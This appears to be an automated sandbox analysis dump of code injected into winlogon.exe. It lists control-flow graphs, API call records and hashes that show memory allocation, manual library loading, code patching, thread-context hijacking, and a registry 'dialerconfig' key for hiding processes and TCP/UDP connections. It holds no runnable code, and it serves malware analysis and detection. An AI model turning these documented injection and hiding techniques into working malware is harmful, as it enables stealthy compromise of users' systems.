22406->22410 22407 2d0165e17e1 RegCloseKey 22407->22401 22414 2d0165e181c RegCloseKey 22408->22414 22411 2d0165e104c 5 API calls 22409->22411 22412 2d0165e189c RegCloseKey 22410->22412 22413 2d0165e1885 22410->22413 22415 2d0165e1857 RegCloseKey 22411->22415 22412->22384 22416 2d0165e104c 5 API calls 22413->22416 22414->22406 22415->22410 22417 2d0165e1892 RegCloseKey 22416->22417 22417->22412 22433 2d0165f6168 22418->22433 22420 2d0165e1283 GetProcessHeap 22421 2d0165e12ae _invalid_parameter_noinfo 22420->22421 22421->22376 22423 2d0165e10bf 22422->22423 22424 2d0165e11b5 RegCloseKey 22422->22424 22423->22424 22425 2d0165e10cf RegEnumValueW 22423->22425 22424->22389 22427 2d0165e1125 _invalid_parameter_noinfo 22425->22427 22426 2d0165e114e GetProcessHeap 22426->22427 22427->22424 22427->22425 22427->22426 22428 2d0165e116e GetProcessHeap HeapFree 22427->22428 22428->22427 22429->22391 22430->22399 22431->22403 22432->22407 22434 2d0165f6177 22433->22434 22434->22434 22435 2d0165e554d 22437 2d0165e5554 22435->22437 22436 2d0165e55bb 22437->22436 22438 2d0165e5637 VirtualProtect 22437->22438 22439 2d0165e5663 GetLastError 22438->22439 22440 2d0165e5671 22438->22440 22439->22440 22441 2d01658273c 22443 2d01658276a 22441->22443 22442 2d0165828d4 22443->22442 22444 2d0165827c5 VirtualAlloc 22443->22444 22444->22442 22446 2d0165827ec 22444->22446 22445 2d016582858 LoadLibraryA 22445->22446 22446->22442 22446->22445 22447 2d0165e28c8 22449 2d0165e290e 22447->22449 22448 2d0165e2970 22449->22448 22451 2d0165e3844 22449->22451 22452 2d0165e3866 22451->22452 22453 2d0165e3851 StrCmpNIW 22451->22453 22452->22449 22453->22452 22454 2d0165e3ab9 22457 2d0165e3a06 22454->22457 22455 2d0165e3a70 22456 2d0165e3a56 VirtualQuery 22456->22455 22456->22457 22457->22455 22457->22456 22458 2d0165e3a8a VirtualAlloc 22457->22458 22458->22455 22459 2d0165e3abb GetLastError 22458->22459 22459->22455 22459->22457 22460 2d01661273c 22461 2d01661276a 22460->22461 22462 2d0166127c5 VirtualAlloc 22461->22462 22463 2d0166127ec 22461->22463 22462->22463 22464 2d0165e5cf0 22465 2d0165e5cfd 22464->22465 22466 2d0165e5d09 22465->22466 22475 2d0165e5e1a 22465->22475 22467 2d0165e5d3e 22466->22467 22468 2d0165e5d8d 22466->22468 22469 2d0165e5d66 SetThreadContext 22467->22469 22469->22468 22470 2d0165e5efe 22472 2d0165e5f1e 22470->22472 22486 2d0165e43e0 VirtualFree 22470->22486 22471 2d0165e5e41 VirtualProtect FlushInstructionCache 22471->22475 22482 2d0165e4df0 GetCurrentProcess 22472->22482 22475->22470 22475->22471 22476 2d0165e5f23 22477 2d0165e5f77 22476->22477 22478 2d0165e5f37 ResumeThread 22476->22478 22487 2d0165e7940 RtlLookupFunctionEntry capture_previous_context _log10_special 22477->22487 22479 2d0165e5f6b 22478->22479 22479->22476 22481 2d0165e5fbf 22483 2d0165e4e0c 22482->22483 22484 2d0165e4e22 VirtualProtect FlushInstructionCache 22483->22484 22485 2d0165e4e53 22483->22485 22484->22483 22485->22476 22486->22472 22487->22481

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction ID: 5ecbaa186e8d59cd892059c32c6735f956b01256b6e0a22be3f8683e5b015701
                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction Fuzzy Hash: EE711936210A9086EB209FB6ECD8B9973A5F784B89F801112DE4E47B78EF35C954C744

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                            • String ID: wr
                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction ID: 4674d9df3d536e982c299afeb10ddbd57cf0d0b09ef677d7c97c0013872c700b
                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction Fuzzy Hash: 6411A126305781C2FF149B61F848769B2B4F748B85F84002ADE8D03765EF3ECA05C714

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 59 2d0165e5b30-2d0165e5b57 60 2d0165e5b6b-2d0165e5b76 GetCurrentThreadId 59->60 61 2d0165e5b59-2d0165e5b68 59->61 62 2d0165e5b78-2d0165e5b7d 60->62 63 2d0165e5b82-2d0165e5b89 60->63 61->60 64 2d0165e5faf-2d0165e5fc6 call 2d0165e7940 62->64 65 2d0165e5b9b-2d0165e5baf 63->65 66 2d0165e5b8b-2d0165e5b96 call 2d0165e5960 63->66 69 2d0165e5bbe-2d0165e5bc4 65->69 66->64 72 2d0165e5bca-2d0165e5bd3 69->72 73 2d0165e5c95-2d0165e5cb6 69->73 75 2d0165e5c1a-2d0165e5c8d call 2d0165e4510 call 2d0165e44b0 call 2d0165e4470 72->75 76 2d0165e5bd5-2d0165e5c18 call 2d0165e85c0 72->76 77 2d0165e5e1f-2d0165e5e30 call 2d0165e74bf 73->77 78 2d0165e5cbc-2d0165e5cdc GetThreadContext 73->78 89 2d0165e5c90 75->89 76->89 92 2d0165e5e35-2d0165e5e3b 77->92 81 2d0165e5e1a 78->81 82 2d0165e5ce2-2d0165e5d03 78->82 81->77 82->81 93 2d0165e5d09-2d0165e5d12 82->93 89->69 95 2d0165e5efe-2d0165e5f0e 92->95 96 2d0165e5e41-2d0165e5e98 VirtualProtect FlushInstructionCache 92->96 97 2d0165e5d14-2d0165e5d25 93->97 98 2d0165e5d92-2d0165e5da3 93->98 102 2d0165e5f1e-2d0165e5f2a call 2d0165e4df0 95->102 103 2d0165e5f10-2d0165e5f17 95->103 104 2d0165e5e9a-2d0165e5ea4 96->104 105 2d0165e5ec9-2d0165e5ef9 call 2d0165e78ac 96->105 106 2d0165e5d8d 97->106 107 2d0165e5d27-2d0165e5d3c 97->107 99 2d0165e5e15 98->99 100 2d0165e5da5-2d0165e5dc3 98->100 100->99 109 2d0165e5dc5-2d0165e5e0c call 2d0165e3900 100->109 123 2d0165e5f2f-2d0165e5f35 102->123 103->102 111 2d0165e5f19 call 2d0165e43e0 103->111 104->105 113 2d0165e5ea6-2d0165e5ec1 call 2d0165e4390 104->113 105->92 106->99 107->106 108 2d0165e5d3e-2d0165e5d88 call 2d0165e3970 SetThreadContext 107->108 108->106 109->99 124 2d0165e5e10 call 2d0165e74dd 109->124 111->102 113->105 125 2d0165e5f77-2d0165e5f95 123->125 126 2d0165e5f37-2d0165e5f75 ResumeThread call 2d0165e78ac 123->126 124->99 127 2d0165e5fa9 125->127 128 2d0165e5f97-2d0165e5fa6 125->128 126->123 127->64 128->127
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1666949209-0
                                                                                                                            • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                            • Instruction ID: d170addcbda7b12596392159c148f3388fdea41b115c5373cd1e58d87ea25250
                                                                                                                            • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                            • Instruction Fuzzy Hash: 01D18B76205B8882DB709B56E8D435AB7A0F388B88F504117EACD47BB5DF3ECA55CB40

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 131 2d0165e50d0-2d0165e50fc 132 2d0165e50fe-2d0165e5106 131->132 133 2d0165e510d-2d0165e5116 131->133 132->133 134 2d0165e5118-2d0165e5120 133->134 135 2d0165e5127-2d0165e5130 133->135 134->135 136 2d0165e5132-2d0165e513a 135->136 137 2d0165e5141-2d0165e514a 135->137 136->137 138 2d0165e514c-2d0165e5151 137->138 139 2d0165e5156-2d0165e5161 GetCurrentThreadId 137->139 140 2d0165e56d3-2d0165e56da 138->140 141 2d0165e516d-2d0165e5174 139->141 142 2d0165e5163-2d0165e5168 139->142 143 2d0165e5176-2d0165e517c 141->143 144 2d0165e5181-2d0165e518a 141->144 142->140 143->140 145 2d0165e518c-2d0165e5191 144->145 146 2d0165e5196-2d0165e51a2 144->146 145->140 147 2d0165e51ce-2d0165e5225 call 2d0165e56e0 * 2 146->147 148 2d0165e51a4-2d0165e51c9 146->148 153 2d0165e523a-2d0165e5243 147->153 154 2d0165e5227-2d0165e522e 147->154 148->140 155 2d0165e5255-2d0165e525e 153->155 156 2d0165e5245-2d0165e5252 153->156 157 2d0165e5236 154->157 158 2d0165e5230 154->158 161 2d0165e5273-2d0165e5298 call 2d0165e7870 155->161 162 2d0165e5260-2d0165e5270 155->162 156->155 160 2d0165e52a6-2d0165e52aa 157->160 159 2d0165e52b0-2d0165e52b6 158->159 164 2d0165e52b8-2d0165e52d4 call 2d0165e4390 159->164 165 2d0165e52e5-2d0165e52eb 159->165 160->159 171 2d0165e529e 161->171 172 2d0165e532d-2d0165e5342 call 2d0165e3cc0 161->172 162->161 164->165 176 2d0165e52d6-2d0165e52de 164->176 166 2d0165e52ed-2d0165e530c call 2d0165e78ac 165->166 167 2d0165e5315-2d0165e5328 165->167 166->167 167->140 171->160 178 2d0165e5344-2d0165e534c 172->178 179 2d0165e5351-2d0165e535a 172->179 176->165 178->160 180 2d0165e536c-2d0165e53ba call 2d0165e8c60 179->180 181 2d0165e535c-2d0165e5369 179->181 184 2d0165e53c2-2d0165e53ca 180->184 181->180 185 2d0165e54d7-2d0165e54df 184->185 186 2d0165e53d0-2d0165e54bb call 2d0165e7440 184->186 187 2d0165e5523-2d0165e552b 185->187 188 2d0165e54e1-2d0165e54f4 call 2d0165e4590 185->188 196 2d0165e54bf-2d0165e54ce call 2d0165e4060 186->196 197 2d0165e54bd 186->197 192 2d0165e552d-2d0165e5535 187->192 193 2d0165e5537-2d0165e5546 187->193 203 2d0165e54f8-2d0165e5521 188->203 204 2d0165e54f6 188->204 192->193 199 2d0165e5554-2d0165e5561 192->199 194 2d0165e554f 193->194 195 2d0165e5548 193->195 194->199 195->194 208 2d0165e54d2 196->208 209 2d0165e54d0 196->209 197->185 200 2d0165e5564-2d0165e55b9 call 2d0165e85c0 199->200 201 2d0165e5563 199->201 210 2d0165e55bb-2d0165e55c3 200->210 211 2d0165e55c8-2d0165e5661 call 2d0165e4510 call 2d0165e4470 VirtualProtect 200->211 201->200 203->185 204->187 208->184 209->185 216 2d0165e5663-2d0165e5668 GetLastError 211->216 217 2d0165e5671-2d0165e56d1 211->217 216->217 217->140
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                            • Instruction ID: c79f08a0408f7d8f647ff0ca48cb583e9eb7eb6c6cfc1174afee583460d097fa
                                                                                                                            • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                            • Instruction Fuzzy Hash: 5402A832619BC486EB60CB95E89435AF7A1F3C4794F504016EACE87BA9DF7EC954CB00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocQuery
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 31662377-0
                                                                                                                            • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                            • Instruction ID: 28efb8197a5b457b3dea2d752150fd58e1380e9d813bcaab70eb5bc99618508c
                                                                                                                            • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                            • Instruction Fuzzy Hash: B9311722219AC481EF30DB95E89935EE6A0F384784F900526F5CD467B9DF7ECB808B04

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1683269324-0
                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction ID: 9ff0edd3e6e9ab198c3d17986b58ccebaadaacc8bbb4bde1db76d12e6f3558f5
                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction Fuzzy Hash: 1C1161306147C182FF6097E1FDCDB69A298AB58345FD0512BE90E815F6EF7ACE44C210

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3733156554-0
                                                                                                                            • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                            • Instruction ID: d1e0e70aa0f07598b53ed8611aa5d9f6cf8e10010ed7fed8d00852c42d35725f
                                                                                                                            • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                            • Instruction Fuzzy Hash: FFF0BD26219B84C1DB30DB85E89575AABA0F3887D4F945117BACD47B79CA3ECA908B40

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 265 2d01658273c-2d0165827a4 call 2d0165829d4 * 4 274 2d0165827aa-2d0165827ad 265->274 275 2d0165829b2 265->275 274->275 276 2d0165827b3-2d0165827b6 274->276 277 2d0165829b4-2d0165829d0 275->277 276->275 278 2d0165827bc-2d0165827bf 276->278 278->275 279 2d0165827c5-2d0165827e6 VirtualAlloc 278->279 279->275 280 2d0165827ec-2d01658280c 279->280 281 2d016582838-2d01658283f 280->281 282 2d01658280e-2d016582836 280->282 283 2d0165828df-2d0165828e6 281->283 284 2d016582845-2d016582852 281->284 282->281 282->282 285 2d0165828ec-2d016582901 283->285 286 2d016582992-2d0165829b0 283->286 284->283 287 2d016582858-2d01658286a LoadLibraryA 284->287 285->286 288 2d016582907 285->288 286->277 289 2d0165828ca-2d0165828d2 287->289 290 2d01658286c-2d016582878 287->290 293 2d01658290d-2d016582921 288->293 289->287 291 2d0165828d4-2d0165828d9 289->291 294 2d0165828c5-2d0165828c8 290->294 291->283 296 2d016582982-2d01658298c 293->296 297 2d016582923-2d016582934 293->297 294->289 295 2d01658287a-2d01658287d 294->295 301 2d01658287f-2d0165828a5 295->301 302 2d0165828a7-2d0165828b7 295->302 296->286 296->293 299 2d01658293f-2d016582943 297->299 300 2d016582936-2d01658293d 297->300 305 2d01658294d-2d016582951 299->305 306 2d016582945-2d01658294b 299->306 304 2d016582970-2d016582980 300->304 303 2d0165828ba-2d0165828c1 301->303 302->303 303->294 304->296 304->297 307 2d016582963-2d016582967 305->307 308 2d016582953-2d016582961 305->308 306->304 307->304 310 2d016582969-2d01658296c 307->310 308->304 310->304
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3550616410-0
                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction ID: 0197585b0632c450f7244b768ee28b396eb2739c6a19c1b09bc8c1b93abfbced
                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction Fuzzy Hash: 01610532B016D087EB54CF56988872D7B9AF754BD4F98C122DE5D07B98DA34DC92C780

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 000002D0165E1628: GetProcessHeap.KERNEL32 ref: 000002D0165E1633
                                                                                                                              • Part of subcall function 000002D0165E1628: HeapAlloc.KERNEL32 ref: 000002D0165E1642
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16B2
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16DF
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E16F9
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1719
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1734
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1754
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E176F
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E178F
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17AA
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E17CA
                                                                                                                            • Sleep.KERNEL32 ref: 000002D0165E1AD7
                                                                                                                            • SleepEx.KERNELBASE ref: 000002D0165E1ADD
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17E5
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1805
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1820
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1840
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E185B
                                                                                                                              • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E187B
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1896
                                                                                                                              • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E18A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1534210851-0
                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction ID: 07e4e4e3ba5978a263fb33c37be15a198cbe7b0fb120eabd57c8358f31885df7
                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction Fuzzy Hash: D331C061A006C141FF709BA6DEC93E9B3A9AB44BC6F8454279E0E8B7B5EE15CD51C210

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 350 2d01661273c-2d0166127a4 call 2d0166129d4 * 4 359 2d0166129b2 350->359 360 2d0166127aa-2d0166127ad 350->360 362 2d0166129b4-2d0166129d0 359->362 360->359 361 2d0166127b3-2d0166127b6 360->361 361->359 363 2d0166127bc-2d0166127bf 361->363 363->359 364 2d0166127c5-2d0166127e6 VirtualAlloc 363->364 364->359 365 2d0166127ec-2d01661280c 364->365 366 2d016612838-2d01661283f 365->366 367 2d01661280e-2d016612836 365->367 368 2d016612845-2d016612852 366->368 369 2d0166128df-2d0166128e6 366->369 367->366 367->367 368->369 372 2d016612858-2d01661286a 368->372 370 2d016612992-2d0166129b0 369->370 371 2d0166128ec-2d016612901 369->371 370->362 371->370 373 2d016612907 371->373 379 2d0166128ca-2d0166128d2 372->379 380 2d01661286c-2d016612878 372->380 375 2d01661290d-2d016612921 373->375 377 2d016612923-2d016612934 375->377 378 2d016612982-2d01661298c 375->378 383 2d016612936-2d01661293d 377->383 384 2d01661293f-2d016612943 377->384 378->370 378->375 379->372 381 2d0166128d4-2d0166128d9 379->381 385 2d0166128c5-2d0166128c8 380->385 381->369 387 2d016612970-2d016612980 383->387 388 2d016612945-2d01661294b 384->388 389 2d01661294d-2d016612951 384->389 385->379 386 2d01661287a-2d01661287d 385->386 390 2d0166128a7-2d0166128b7 386->390 391 2d01661287f-2d0166128a5 386->391 387->377 387->378 388->387 392 2d016612963-2d016612967 389->392 393 2d016612953-2d016612961 389->393 395 2d0166128ba-2d0166128c1 390->395 391->395 392->387 394 2d016612969-2d01661296c 392->394 393->387 394->387 395->385
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction ID: 27b6638d6d0c71c34111095f9da34a330afb2682755feb3a9ae719f77f8aacec
                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction Fuzzy Hash: 806157B2B012D087DB54CF5AD89472DB39AF795B94F98C52ACE5D03798DA38DC92C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction ID: d3b596ab05dff9b38269f4f9cd95cbcd315625dbf01702ec5e409f4043454db4
                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction Fuzzy Hash: 40B18166210AD18AEF648FA5DD887A9B3A5FB44BC4F849017EE0D537A8DF36CE41C740
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3140674995-0
                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction ID: 20d5fac5d31b6f1b1b7ff7f3eed5433fc4695a7276fd3db9f08efe4689facb88
                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction Fuzzy Hash: 8A311C76205BC08AEB609FA0EC947ED7365F785744F84442ADA4E57BA8EF39CA48C710
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1239891234-0
                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction ID: 3b7d1831335daaf51ebfd733c592f0e35ffd938c3d674718b742b5f189087fd6
                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction Fuzzy Hash: 09314036214FC086EB60CF65EC843AE73A4F789754F940226EA9D47BA5DF39CA55CB00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction ID: 9a0ea9a6380481f60f05ebf9f0f7dac1e0ce870ea14a63a246dffcc75113e077
                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
